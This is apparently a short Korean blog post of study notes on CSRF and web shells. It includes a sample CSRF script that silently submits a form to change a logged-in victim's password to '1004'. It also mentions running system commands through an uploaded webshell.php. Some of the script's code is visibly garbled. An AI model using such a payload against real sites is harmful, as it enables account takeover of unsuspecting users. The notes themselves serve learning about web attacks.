Cross Site Request Forgery
CSRF 공격은 로그온 된 피해자의 취약한 웹 애플리케이션에 피해자의 세션 쿠키와 기타 다른 인증정보를 자동으로 포함하여 위조된 HTTP 요청을 강제로 보내도록 하는 것이다.이것은 공격자가 취약한 애플리케이션이 피해자로부터의 정당한 요청이라고 오해할 수 있는 요청들을 강제로 만들 수 있다.
1. 악성스크립트 삽입
(단축어를 사용할수록 해독하기 어려움)<script>var f= document.createElement("form");f.setAttribute("action","POST");
f.setAttribute ("action","user_info_update.php");varh=document.createElement
("input");h.setAttribute("type","hidden");h.setAttribute("name","m_pw");
h.setAttribute("value","1004");f.appendchild(h);document.body.appendchild(f);
f.submit();</script>
2. 악성스크립트를 읽고, 다운로드, 저장
3. 악성스크립트 실행
Web Shell
shell; 사용자와 kernell사이에 인터페이스를 제공
Web에서 리눅스 명령어를 입력하면 실행됨 (system($cmd1))
updike.html & upfile.php 에 webshell.php(file)을 업로드해 확인
2018-10-26
No comments:
Post a Comment